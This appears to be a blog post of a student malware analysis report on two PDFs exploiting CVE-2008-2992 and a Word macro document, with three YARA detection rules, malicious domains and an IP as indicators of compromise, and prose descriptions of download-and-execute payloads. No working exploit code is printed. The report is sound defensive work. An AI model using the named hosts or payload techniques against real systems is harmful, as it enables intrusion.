Gary Jones
Gary Jones
Malware AnalysisYARA RulesSpear-PhishingCVE-2008-2992VBA MacrosCybersecurity

Word and PDF Malware Reverse Engineering Report: Practical Assignment 4

Word and PDF Malware Reverse Engineering Report: Practical Assignment 4
0 views
3 min read
#Malware Analysis#YARA Rules#Spear-Phishing#CVE-2008-2992#VBA Macros#Cybersecurity
Table Of Content

Malware Reverse Engineering Report: Practical Assignment 4

Situation:

This assignment analyzed three malicious documents from spear-phishing campaigns: two PDFs (sample4a.pdf and sample4b.pdf) and a Microsoft Word document (sample4c.doc). The focus was on extracting metadata, identifying malicious behaviors, and creating YARA rules for detection.

Obstacles:

  1. Document Compression:
    • The PDF files employed /Filter /FlateDecode, requiring decompression for analysis.
  2. Obfuscated Code:
    • JavaScript and VBA code were heavily obfuscated, complicating static analysis.
  3. Multiple Exploit Techniques:
    • The PDFs used CVE-2008-2992 (util.printf buffer overflow) while the Word document leveraged shell commands and external HTTP requests.

Actions Taken:

  1. Sample4a.pdf:

    • Used peepdf and pdf-parser to extract metadata and decompress encoded streams.
    • Detected JavaScript exploiting CVE-2008-2992 to execute shell code.
    • Analyzed shell code using SpiderMonkey and scdbg, identifying a download of a.exe from beshragos.com.
    • Developed the following YARA rule: 
      rule beshragos_yara {
  meta:
    description = "Detects malicious PDF from beshragos.com"
  strings:
    $a = "/ID[<CA16DB0E50F60C66FCDBDA9D468C7D94><CA16DB0E50F60C66FCDBDA9D468C7D94>]"
  condition:
    ($a)
}

  2. Sample4b.pdf:

    • Analyzed with peepdf, revealing obfuscated JavaScript invoking the Z0PEA5PLzPyyw() function.
    • The function contacted 64.22.81.244 to download and execute style.exe via the util.printf exploit.
    • Created the following YARA rule: 
      rule style_yara {
  meta:
    description = "Detects malicious PDF that downloads style.exe"
  strings:
    $a = "<</OpenAction <</JS (this.Z0PEA5PLzPyyw\\(\\))"
  condition:
    ($a)
}

  3. Sample4c.doc:

    • Examined with oledump.py to extract VBA macros.
    • Identified a bin.exe download from fachonet.com, creating YEWZMJFAHIB.exe in the Temp directory.
    • Used a custom Python script to deobfuscate hex-encoded strings.
    • Developed the following YARA rule: 
      rule fachonet_yara {
  meta:
    description = "Detects malicious document from fachonet.com"
  strings:
    $a = "\\YEWZMJFAHIB.exe"
  condition:
    ($a)
}

Results:

  1. Malware Identified:
    • Sample4a and Sample4b exploited CVE-2008-2992.
    • Sample4c downloaded and executed files from fachonet.com.
  2. Indicators of Compromise:
    • Domains: beshragos.com, 64.22.81.244, fachonet.com.
    • Files: a.exe, style.exe, YEWZMJFAHIB.exe.

Tool Purpose Overview:

peepdf:

  • Analyzed PDF metadata and extracted JavaScript for static analysis.

pdf-parser:

  • Decompressed encoded streams in PDFs.

oledump.py:

  • Extracted and analyzed macros from Word documents.

SpiderMonkey:

  • Executed and debugged JavaScript shell code.

scdbg:

  • Simulated shell code execution to analyze behavior.

RegShot:

  • Monitored file system and registry changes post-execution.

Recommendations:

  1. Patch Vulnerable Software:
    • Update Adobe Reader and Microsoft Office to mitigate known exploits.
  2. Monitor Network Activity:
    • Block suspicious domains and IPs identified as IoCs.
  3. Enhance Email Security:
    • Filter spear-phishing emails containing malicious attachments.
  4. User Training:
    • Educate users on recognizing and avoiding phishing attempts.

View PDF Document